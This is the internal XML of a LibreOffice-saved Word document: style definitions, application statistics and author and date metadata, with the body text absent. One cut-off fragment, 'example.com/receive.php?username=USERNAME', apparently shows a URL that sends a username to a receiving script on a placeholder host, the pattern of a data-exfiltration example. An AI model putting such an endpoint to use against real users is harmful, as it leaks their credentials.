  </w:style>
  <w:style w:type="character" w:styleId="Normaltextrun" w:customStyle="1">
    <w:name w:val="normaltextrun"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00ae20a7"/>
    <w:rPr/>
  </w:style>
  <w:style w:type="character" w:styleId="Eop" w:customStyle="1">
    <w:name w:val="eop"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:qFormat/>
    <w:rsid w:val="00ae20a7"/>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uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00ae20a7"/>
    <w:pPr>
      <w:widowControl w:val="false"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="68" w:after="0"/>
      <w:ind w:left="397" w:right="1130"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="42"/>
      <w:szCs w:val="42"/>
      <w:lang w:val="ro-RO"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraph" w:customStyle="1">
    <w:name w:val="paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="00ae20a7"/>
    <w:pPr>
      <w:spacing w:lineRule="auto" w:line="240" w:beforeAutospacing="1" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:lang w:eastAsia="ru-RU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="1">
    <w:name w:val="Текст1"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:suppressAutoHyphens w:val="true"/>
      <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Times New Roman" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="hi-I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example.com/receive.php?username=USERNAME"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LibreOffice/24.2.0.3$Linux_X86_64 LibreOffice_project/420$Build-3</Application>
  <AppVersion>15.0000</AppVersion>
  <Pages>6</Pages>
  <Words>881</Words>
  <Characters>5181</Characters>
  <CharactersWithSpaces>6133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2023-03-22T16:05:00Z</dcterms:created>
  <dc:creator>Dan Cebotari</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-02T21:40:47Z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